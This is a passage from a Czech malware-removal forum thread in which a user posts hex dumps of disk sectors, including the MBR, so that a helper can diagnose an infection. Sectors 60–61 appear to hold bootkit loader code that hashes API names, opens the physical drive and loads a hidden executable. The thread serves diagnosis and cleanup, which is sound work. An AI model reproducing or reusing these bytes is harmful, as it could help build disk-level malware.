44 49 53 4B 01 80 FF FF FE 1E 00 01 00 FF 3F 00 00 10 00 00 00 3F 00 00 00 B0 4B F9 0D 00 00 00 00 00 02 1B 7A 00 F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
sektor 60:
8B F0 85 C0 9C 75 05 83 44 24 04 00 60 FC 8B 7C 24 24 81 E7 00 00 F0 FF B0 C7 AE 75 FD 81 3F 46 34 00 40 75 F5 B0 A1 AE 75 FD 8B 37 8B 36 8B 36 8B 5E 18 8B EB 43 81 3B 6A 4B 6A 19 75 F7 80 7B 04 89 75 03 83 C3 06 80 7B 04 E8 75 E8 8D 7B 09 B0 E8 AE 75 FD 66 81 7F 04 84 C0 75 D8 8B 17 8D 54 3A 04 E8 00 00 00 00 58 66 0D FF 01 40 89 50 04 89 68 0C 57 8B 75 3C 8B 74 35 50 03 F5 4E 81 CE FF 0F 00 00 81 EE FF 01 00 00 8B FE 96 B9 80 00 00 00 F3 A5 5F 2B C7 83 E8 04 AB 61 9D C3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
sektor 61:
8B 14 24 68 78 56 34 12 8B 0C 24 68 78 56 34 12 0F 20 C0 50 25 FF FF FE FF 0F 22 C0 2B CA 58 0F 22 C0 FF 34 24 68 62 E0 07 37 E8 3B 00 00 00 59 59 68 AB 01 00 00 6A 00 FF D0 60 E8 00 00 00 00 5E 83 C6 15 8B F8 6A 6A 59 F3 A5 B1 80 8D BE 00 FE FF FF FF E0 33 C0 61 FF 74 24 0C FF 54 24 08 59 5A 60 87 CD E8 52 00 00 00 60 8B 6C 24 28 8B 45 3C 8B 54 05 78 03 D5 8B 4A 18 8B 5A 20 03 DD E3 32 49 8B 34 8B 03 F5 33 FF FC 33 C0 AC 3A C4 74 07 C1 CF 0D 03 F8 EB F2 3B 7C 24 24 75 E1 8B 5A 24 03 DD 66 8B 0C 4B 8B 5A 1C 03 DD 8B 04 8B 03 C5 EB 02 33 C0 89 44 24 1C 61 C3 5B 55 68 B8 74 29 85 FF D3 33 D2 52 52 8B F4 52 8B FC E8 26 00 00 00 5C 00 3F 00 3F 00 5C 00 50 00 68 00 79 00 73 00 69 00 63 00 61 00 6C 00 44 00 72 00 69 00 76 00 65 00 30 00 00 00 68 24 00 26 00 8B CC 52 52 6A 40 51 52 6A 18 8B CC 6A 20 6A 03 56 51 68 00 00 10 80 57 FF D0 55 68 62 E0 07 37 FF D3 97 55 68 16 D5 FC 84 FF D3 89 06 68 1B 00 00 00 68 00 00 F2 F1 8B CC 6A 00 51 B9 00 54 03 00 51 51 6A 00 FF D7 50 56 8B CE 96 33 D2 52 52 52 FF 74 24 58 FF 11 55 68 5F 4C D4 DC FF D3 FF 74 24 40 FF D0 8B 46 3C 03 C6 50 8B 50 50 52 52 6A 00 FF D7 97 59 57 32 C0 F3 AA 5F 58 60 8B 48 54 F3 A4 61 2B C6 03 C7 0F B7 48 06 8D 90 F8 00 00 00 60 03 72 14 03 7A 0C 8B 4A 10 E3 02 F3 A4 61 83 C2 28 E2 EC 50 60 8B FE 91 B9 00 D5 00 00 F3 AB 61 55 68 1F 9D 48 9D FF D3 95 56 FF D5 8B 74 24 08 FF B4 24 84 00 00 00 57 8B 46 28 03 C7 FF D0 0B C0 7D 0E 8B 4E 50 E3 09 32 C0 57 F3 AA 5F 57 FF D5 83 C4 60 33 C0 8B FB 83 EF 15 B9 9C 01 00 00 F3 AA 61 C2 04 00 00 00 00 00 00 00 00 00 00
sektor 62:
33 C0 8E D0 BC 00 7C FB 50 07 50 1F FC BE 1B 7C BF 1B 06 50 57 B9 E5 01 F3 A4 CB BD BE 07 B1 04 38 6E 00 7C 09 75 13 83 C5 10 E2 F4 CD 18 8B F5 83 C6 10 49 74 19 38 2C 74 F6 A0 B5 07 B4 07 8B F0 AC 3C 00 74 FC BB 07 00 B4 0E CD 10 EB F2 88 4E 10 E8 46 00 73 2A FE 46 10 80 7E 04 0B 74 0B 80 7E 04 0C 74 05 A0 B6 07 75 D2 80 46 02 06 83 46 08 06 83 56 0A 00 E8 21 00 73 05 A0 B6 07 EB BC 81 3E FE 7D 55 AA 74 0B 80 7E 10 00 74 C8 A0 B7 07 EB A9 8B FC 1E 57 8B F5 CB BF 05 00 8A 56 00 B4 08 CD 13 72 23 8A C1 24 3F 98 8A DE 8A FC 43 F7 E3 8B D1 86 D6 B1 06 D2 EE 42 F7 E2 39 56 0A 77 23 72 05 39 46 08 73 1C B8 01 02 BB 00 7C 8B 4E 02 8B 56 00 CD 13 73 51 4F 74 4E 32 E4 8A 56 00 CD 13 EB E4 8A 56 00 60 BB AA 55 B4 41 CD 13 72 36 81 FB 55 AA 75 30 F6 C1 01 74 2B 61 60 6A 00 6A 00 FF 76 0A FF 76 08 6A 00 68 00 7C 6A 01 6A 10 B4 42 8B F4 CD 13 61 61 73 0E 4F 74 0B 32 E4 8A 56 00 CD 13 EB D6 61 F9 C3 4E 65 70 6C 61 74 6E A0 20 74 61 62 75 6C 6B 61 20 6F 64 64 A1 6C 85 00 43 68 79 62 61 20 70 FD 69 20 6E 61 9F A1 74 A0 6E A1 20 6F 70 65 72 61 9F 6E A1 68 6F 20 73 79 73 74 82 6D 75 00 4F 70 65 72 61 9F 6E A1 20 73 79 73 74 82 6D 20 6E 65 6E 61 6C 65 7A 65 6E 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2C 44 6A 8C 73 F4 D0 00 00 80 01 01 00 07 FE FF FF 3F 00 00 00 37 16 71 02 00 00 C1 FF 0F FE FF FF 76 16 71 02 8A E2 87 0B 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 AA
sektor 64:
05 00 4E 00 54 00 4C 00 44 00 52 00 04 00 24 00 49 00 33 00 30 00 00 E0 00 00 00 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 EB 12 90 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8C C8 8E D8 C1 E0 04 FA 8B E0 FB E8 03 FE 66 0F B7 06 0B 00 66 0F B6 1E 0D 00 66 F7 E3 66 A3 4E 02 66 8B 0E 40 00 80 F9 00 0F 8F 0E 00 F6 D9 66 B8 01 00 00 00 66 D3 E0 EB 08 90 66 A1 4E 02 66 F7 E1 66 A3 52 02 66 0F B7 1E 0B 00 66 33 D2 66 F7 F3 66 A3 56 02 E8 71 04 66 8B 0E 4A 02 66 89 0E 22 02 66 03 0E 52 02 66 89 0E 26 02 66 03 0E 52 02 66 89 0E 2A 02 66 03 0E 52 02 66 89 0E 3A 02 66 03 0E 52 02 66 89 0E 42 02 66 B8 90 00 00 00 66 8B 0E 22 02 E8 5F 09 66 0B C0 0F 84 57 FE 66 A3 2E 02 66 B8 A0 00 00 00 66 8B 0E 26 02 E8 46 09 66 A3 32 02 66 B8 B0 00 00 00 66 8B 0E 2A 02 E8 34 09 66 A3 36 02 66 A1 2E 02 66 0B C0 0F 84 24 FE 67 80 78 08 00 0F 85 1B FE 67 66 8D 50 10 67 03 42 04 67 66 0F B6 48 0C 66 89 0E 62 02 67 66 8B 48 08 66 89 0E 5E 02 66 A1 5E 02 66 0F B7 0E 0B 00 66 33 D2 66 F7 F1 66 A3 66 02 66 A1 42 02 66 03 06 5E 02 66 A3 46 02 66 83 3E 32 02 00 0F 84 1D 00 66 83 3E 36 02 00 0F 84 C8 FD 66 8B 1E 36 02 1E 07 66 8B 3E 46 02 66 A1 2A 02 E8 BC 01 66 0F B7 0E 00 02 66 B8 02 02 00 00 E8 FE 07 66 0B C0 0F 84 A8 09 67 66 8B 00 1E 07 66 8B 3E 3A 02 E8 31 06 66 A1 3A 02 66 BB 20 00 00 00 66 B9 00 00 00 00 66 BA 00 00 00 00 E8 D6 00 66 85 C0 0F 85 23 00 66 A1 3A 02 66 BB 80 00 00 00 66 B9 00 00 00 00
sektor 65:
66 BA 00 00 00 00 E8 B6 00 66 0B C0 0F 85 44 00 E9 57 09 66 33 D2 66 B9 80 00 00 00 66 A1 3A 02 E8 BC 08 66 0B C0 0F 84 40 09 1E 07 66 8B 3E 3A 02 E8 CD 05 66 A1 3A 02 66 BB 80 00 00 00 66 B9 00 00 00 00 66 BA 00 00 00 00 E8 72 00 66 0B C0 0F 84 16 09 67 66 0F B7 58 0C 66 81 E3 FF 00 00 00 0F 85 0B 09 66 8B D8 68 00 20 07 66 2B FF 66 A1 3A 02 E8 F2 00 8A 16 24 00 B8 E8 03 8E C0 8D 36 0B 00 2B C0 68 00 20 50 CB 06 1E 66 60 66 8B DA 66 0F B6 0E 0D 00 66 F7 E1 66 A3 10 00 66 8B C3 66 F7 E1 A3 0E 00 8B DF 83 E3 0F 8C C0 66 C1 EF 04 03 C7 50 07 E8 0E FC 66 61 90 1F 07 C3 67 03 40 14 67 66 83 38 FF 0F 84 4C 00 67 66 39 18 0F 85 33 00 66 0B C9 0F 85 0A 00 67 80 78 09 00 0F 85 23 00 C3 67 3A 48 09 0F 85 1A 00 66 8B F0 67 03 70 0A E8 97 06 66 51 1E 07 66 8B FA F3 A7 66 59 0F 85 01 00 C3 67 66 83 78 04 00 0F 84 07 00 67 66 03 40 04 EB AB 66 2B C0 C3 66 8B F3 E8 6C 06 67 66 03 00 67 F7 40 0C 02 00 0F 85 34 00 67 66 8D 50 10 67 3A 4A 40 0F 85 18 00 67 66 8D 72 42 E8 49 06 66 51 1E 07 66 8B FB F3 A7 66 59 0F 85 01 00 C3 67 83 78 08 00 0F 84 06 00 67 03 40 08 EB C2 66 33 C0 C3 67 80 7B 08 00 0F 85 1C 00 06 1E 66 60 67 66 8D 53 10 67 66 8B 0A 66 8B F3 67 03 72 04 F3 A4 66 61 90 1F 07 C3 66 50 67 66 8D 53 10 66 85 C0 0F 85 0A 00 67 66 8B 4A 08 66 41 EB 11 90 67 66 8B 42 18 66 33 D2 66 F7 36 4E 02 66 8B C8 66 2B C0 66 5E E8 01 00 C3 06 1E 66 60 67 80 7B 08 01 0F 84 03 00 E9 93 FB 66 83 F9 00 0F 85 06 00 66 61 90 1F 07 C3 66 53 66 50 66 51 66 56 66 57 06 E8 91 04 66 8B D1 07 66 5F 66 5E 66 59 66 85 C0 0F 84 34 00 66 3B CA 0F 8D
-
- Návštěvník
- Příspěvky: 43
- Registrován: 21 led 2010 10:56
Re: Angela.C prosím o pomoc!!!
ne, že jsem ji nechtěl, říkal jsem, že bych zkusil tu první, pak jsem se jen ptal jestli zmizne ta havěť a tys mě začal rovnou navigovat na tu druhou, říkal jsem si, že určitě víš co děláš a tak jsem radši držel hubu a krok 

-
- Návštěvník
- Příspěvky: 43
- Registrován: 21 led 2010 10:56
Re: Angela.C prosím o pomoc!!!
ok, provedu, ale tentokrát se mi zoprazily i jiný hodnoty než nuly v sektoru 0:
33 C0 8E D0 BC 00 7C FB 50 07 50 1F FC BE 1B 7C BF 1B 06 50 57 B9 E5 01 F3 A4 CB BD BE 07 B1 04 38 6E 00 7C 09 75 13 83 C5 10 E2 F4 CD 18 8B F5 83 C6 10 49 74 19 38 2C 74 F6 A0 B5 07 B4 07 8B F0 AC 3C 00 74 FC BB 07 00 B4 0E CD 10 EB F2 88 4E 10 E8 46 00 73 2A FE 46 10 80 7E 04 0B 74 0B 80 7E 04 0C 74 05 A0 B6 07 75 D2 80 46 02 06 83 46 08 06 83 56 0A 00 E8 21 00 73 05 A0 B6 07 EB BC 81 3E FE 7D 55 AA 74 0B 80 7E 10 00 74 C8 A0 B7 07 EB A9 8B FC 1E 57 8B F5 CB BF 05 00 8A 56 00 B4 08 CD 13 72 23 8A C1 24 3F 98 8A DE 8A FC 43 F7 E3 8B D1 86 D6 B1 06 D2 EE 42 F7 E2 39 56 0A 77 23 72 05 39 46 08 73 1C B8 01 02 BB 00 7C 8B 4E 02 8B 56 00 CD 13 73 51 4F 74 4E 32 E4 8A 56 00 CD 13 EB E4 8A 56 00 60 BB AA 55 B4 41 CD 13 72 36 81 FB 55 AA 75 30 F6 C1 01 74 2B 61 60 6A 00 6A 00 FF 76 0A FF 76 08 6A 00 68 00 7C 6A 01 6A 10 B4 42 8B F4 CD 13 61 61 73 0E 4F 74 0B 32 E4 8A 56 00 CD 13 EB D6 61 F9 C3 4E 65 70 6C 61 74 6E A0 20 74 61 62 75 6C 6B 61 20 6F 64 64 A1 6C 85 00 43 68 79 62 61 20 70 FD 69 20 6E 61 9F A1 74 A0 6E A1 20 6F 70 65 72 61 9F 6E A1 68 6F 20 73 79 73 74 82 6D 75 00 4F 70 65 72 61 9F 6E A1 20 73 79 73 74 82 6D 20 6E 65 6E 61 6C 65 7A 65 6E 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2C 44 6A 8C 73 F4 D0 00 00 80 01 01 00 07 FE FF FF 3F 00 00 00 AF C7 45 04 00 00 C1 FF 0F FE FF FF EE C7 45 04 12 31 B3 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 AA
33 C0 8E D0 BC 00 7C FB 50 07 50 1F FC BE 1B 7C BF 1B 06 50 57 B9 E5 01 F3 A4 CB BD BE 07 B1 04 38 6E 00 7C 09 75 13 83 C5 10 E2 F4 CD 18 8B F5 83 C6 10 49 74 19 38 2C 74 F6 A0 B5 07 B4 07 8B F0 AC 3C 00 74 FC BB 07 00 B4 0E CD 10 EB F2 88 4E 10 E8 46 00 73 2A FE 46 10 80 7E 04 0B 74 0B 80 7E 04 0C 74 05 A0 B6 07 75 D2 80 46 02 06 83 46 08 06 83 56 0A 00 E8 21 00 73 05 A0 B6 07 EB BC 81 3E FE 7D 55 AA 74 0B 80 7E 10 00 74 C8 A0 B7 07 EB A9 8B FC 1E 57 8B F5 CB BF 05 00 8A 56 00 B4 08 CD 13 72 23 8A C1 24 3F 98 8A DE 8A FC 43 F7 E3 8B D1 86 D6 B1 06 D2 EE 42 F7 E2 39 56 0A 77 23 72 05 39 46 08 73 1C B8 01 02 BB 00 7C 8B 4E 02 8B 56 00 CD 13 73 51 4F 74 4E 32 E4 8A 56 00 CD 13 EB E4 8A 56 00 60 BB AA 55 B4 41 CD 13 72 36 81 FB 55 AA 75 30 F6 C1 01 74 2B 61 60 6A 00 6A 00 FF 76 0A FF 76 08 6A 00 68 00 7C 6A 01 6A 10 B4 42 8B F4 CD 13 61 61 73 0E 4F 74 0B 32 E4 8A 56 00 CD 13 EB D6 61 F9 C3 4E 65 70 6C 61 74 6E A0 20 74 61 62 75 6C 6B 61 20 6F 64 64 A1 6C 85 00 43 68 79 62 61 20 70 FD 69 20 6E 61 9F A1 74 A0 6E A1 20 6F 70 65 72 61 9F 6E A1 68 6F 20 73 79 73 74 82 6D 75 00 4F 70 65 72 61 9F 6E A1 20 73 79 73 74 82 6D 20 6E 65 6E 61 6C 65 7A 65 6E 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2C 44 6A 8C 73 F4 D0 00 00 80 01 01 00 07 FE FF FF 3F 00 00 00 AF C7 45 04 00 00 C1 FF 0F FE FF FF EE C7 45 04 12 31 B3 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 AA